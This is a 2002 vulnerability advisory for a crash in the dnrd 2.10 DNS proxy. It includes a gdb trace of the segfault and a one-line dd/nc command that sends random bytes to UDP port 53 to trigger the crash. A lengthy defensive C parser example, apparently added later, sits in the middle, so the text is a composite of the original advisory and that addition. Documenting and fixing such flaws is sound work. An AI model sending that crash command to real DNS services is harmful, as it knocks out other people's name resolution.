22nd Jan 2002 [SBWID-5016]
COMMAND
dnrd DoS
SYSTEMS AFFECTED
dnrd 2.10
PROBLEM
Andrew Griffiths posted :
There are various problems with dnrd's DNS request and reply
functions that cause it to crash.
Exploit:
Using two consoles, I did the following, Terminal one got:
[andrewg@blackhole /data/audit/dnrd-2.10/src]$ gdb dnrd
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
(gdb) set arg -s 1.2.3.4 -d
(gdb) run
Starting program: /data/audit/dnrd-2.10/src/dnrd -d
[New Thread 1024 (LWP 3249)]
ERROR: Couldn't kill dnrd: No such process
Debug: cache low/high: 800/1000
Debug: initialising master DNS database
Debug: no master configuration: /etc/dnrd/master
Debug: initialising from /etc/hosts, domain= <none>
Debug: /etc/hosts: 3 records
Debug: Received DNS query for "..\SÖanx, 6h??ü-ÀC?Ï"?>" real ? "?????£æ??@ÖwéÕËl?p?Û@??"
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 3249)]
parse_query (y=0xbffff140, msg=0xb4bffff7 <Address 0xb4bffff7 out of bounds>,
len=1346377321) at dns.c:298
298 if (ntohs(((short int *) msg)[2]) == 0) { /* C is nice. */
Note that the ? are various control characters that I couldn't paste
in, 'cause they are not printable and kept stuffing up vim.
While on terminal two, I did:
dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1
At one stage I also had msg=0x2e2e2e2e <Address 0x2e2e2e2e out of
bounds>. It's not just parse_query that has this problem, but also
places like get_objectname()
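The crash reported above comes from reading fields of the datagram (here the question count at `((short int *) msg)[2]`, and later the name labels) before checking that the datagram is actually long enough to contain them, so a short or random UDP payload drives the pointer past the buffer. As an added illustration, not dnrd's code, here is a bounds-checked DNS question parser in C that rejects such datagrams instead of dereferencing past the end. The function names `parse_query_checked`, `query_is_wellformed` and `sample_query_name` and the sample datagrams are constructed for this example and do not come from the advisory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN 12   /* fixed DNS header: id, flags, four 16-bit counts */

/* Read a 16-bit big-endian field byte-wise: no alignment or strict-aliasing
 * assumptions, unlike casting msg to (short int *). */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/*
 * Hypothetical hardened parser (not dnrd's parse_query). Copies the dotted
 * question name into name_out and returns the qtype, or -1 if the datagram
 * is malformed. Every read is checked against len first, so a short or
 * random datagram is rejected instead of being dereferenced out of bounds.
 */
int parse_query_checked(const uint8_t *msg, size_t len,
                        char *name_out, size_t name_cap)
{
    size_t pos, out = 0;

    if (msg == NULL || name_out == NULL || name_cap < 2) return -1;
    if (len < DNS_HDR_LEN) return -1;        /* header incomplete */
    if (msg[2] & 0x80) return -1;            /* QR set: a reply, not a query */
    if (rd16(msg + 4) != 1) return -1;       /* exactly one question expected */

    pos = DNS_HDR_LEN;
    for (;;) {
        uint8_t lablen;

        if (pos >= len) return -1;           /* name runs off the end */
        lablen = msg[pos++];
        if (lablen == 0) break;              /* root label ends the name */
        if (lablen & 0xC0) return -1;        /* design choice: no compression pointers in a query name */
        if (lablen > len - pos) return -1;   /* label bytes past the end */
        if (out + lablen + 2 > name_cap) return -1;  /* room for '.', label and NUL */
        if (out > 0) name_out[out++] = '.';
        memcpy(name_out + out, msg + pos, lablen);
        out += lablen;
        pos += lablen;
    }
    name_out[out] = '\0';
    if (len - pos < 4) return -1;            /* qtype and qclass missing */
    return rd16(msg + pos);
}

/* Verdict-only wrapper for code paths that just need accept/reject. */
int query_is_wellformed(const uint8_t *msg, size_t len)
{
    char name[256];
    return parse_query_checked(msg, len, name, sizeof name) >= 0;
}

/* Constructed sample: a well-formed A query for "example.com", 29 bytes. */
const uint8_t GOOD_QUERY[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01
};

/* Constructed sample: qdcount is 1 but the first label claims 63 bytes
 * while only 2 remain; an unchecked parser reads past the buffer here. */
const uint8_t TRUNCATED_LABEL[] = {
    0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    63, 'a', 'b'
};

/* Parses the good sample and returns its question name, or NULL. */
const char *sample_query_name(void)
{
    static char name[256];
    if (parse_query_checked(GOOD_QUERY, sizeof GOOD_QUERY, name, sizeof name) < 0)
        return NULL;
    return name;
}

int main(void)
{
    uint8_t filler[64];
    memset(filler, 0x2e, sizeof filler);  /* constructed stand-in for a random datagram */

    printf("good query      : %s -> %s\n", sample_query_name(),
           query_is_wellformed(GOOD_QUERY, sizeof GOOD_QUERY) ? "accepted" : "rejected");
    printf("truncated header: %s\n",
           query_is_wellformed(GOOD_QUERY, 8) ? "accepted" : "rejected");
    printf("truncated label : %s\n",
           query_is_wellformed(TRUNCATED_LABEL, sizeof TRUNCATED_LABEL) ? "accepted" : "rejected");
    printf("0x2e filler     : %s\n",
           query_is_wellformed(filler, sizeof filler) ? "accepted" : "rejected");
    return 0;
}
```

Build with `cc -Wall -o query_check query_check.c` and run it; only the well-formed sample is accepted. The two design points worth carrying into a resolver such as dnrd are that the length is compared before every read (header, each label, and the trailing qtype/qclass), and that a datagram failing any check is simply dropped rather than partially parsed, which is the cheap way to turn a remote crash into a logged discard.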
SOLUTION
Upgrade ??